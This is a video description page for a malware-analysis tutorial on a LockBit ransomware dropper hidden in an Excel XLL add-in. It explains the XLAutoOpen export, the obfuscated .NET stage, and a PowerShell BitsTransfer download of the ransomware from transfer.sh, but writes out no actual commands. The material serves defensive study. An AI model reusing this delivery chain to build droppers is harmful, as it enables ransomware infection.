LockBit Ransomware - XLL Document Malware Analysis
ฝัง
- เผยแพร่เมื่อ 2 ต.ค. 2024
- LockBit is spreading their Ransomware via an XLL document which executes a dropper.
Support us on GH: guidedhacking....
Support us on Patreon: / guidedhacking
Support us on YT: / @guidedhacking
In the video we said that pestudio uploads files to VirusTotal, this is not true. It just searches for the hash. Sorry for the confusion.
LockBit Malware Analysis - XLL Document Dropper
guidedhacking....
We'll begin our Lockbit malware analysis by examining the concept of XLL documents. An XLL is a type of DLL used to add functionality to Excel. For our LockBit ransomware investigation, we'll use PEStudio to assess the XLL file. Examining the exports in PEStudio, XLAutoOpen turns up - an indication of maliciousness.
Threat actors using XLL files often store the next stage of malware in the resources. PEStudio flags three resources; the first are EXCELDNA files common to Excel, not necessarily malicious. The second, oddly named and unrelated to Excel resources, may be malicious. Dump and analyze the third resource to determine if malicious.
Using Detect It Easy (DIE) to examine a dumped file reveals a .NET binary that is obfuscated with ConfuserX. To analyze, a modified version of de4dot is required to deobfuscate. Then, DNSpy can be used to start the malware analysis of LockBit ransomware, with obfuscated strings and two ShellExecute calls.
Deciphering the strings reveals a call to powershell.exe, downloading BitStransfer to obtain another binary, which will then be run by PowerShell. The file, LockBit, is acquired from transfer.sh and executed within the same powershell command. Additionally, using DNSpy, an xlsx file from the binary resources can be extracted - this is a decoy for when the victim downloads the file.
Follow us on Facebook : bit.ly/2vvHfhk
Follow us on Twitter : bit.ly/3bC7J1i
Follow us on Twitch : bit.ly/39ywOZ2
Follow us on Reddit : bit.ly/3bvOB57
Follow us on GitHub : bit.ly/2HoNXIS
Follow us on Instagram : bit.ly/2SoDOlu
lockbit virus
malware analysis
lockbit ransomware removal
lockbit ransomware analysis
lockbit ransomware gang
cyber security
xll document
malware
lockbit ransom
lockbit ransomware decrypt
ransomware explained
reverse engineering
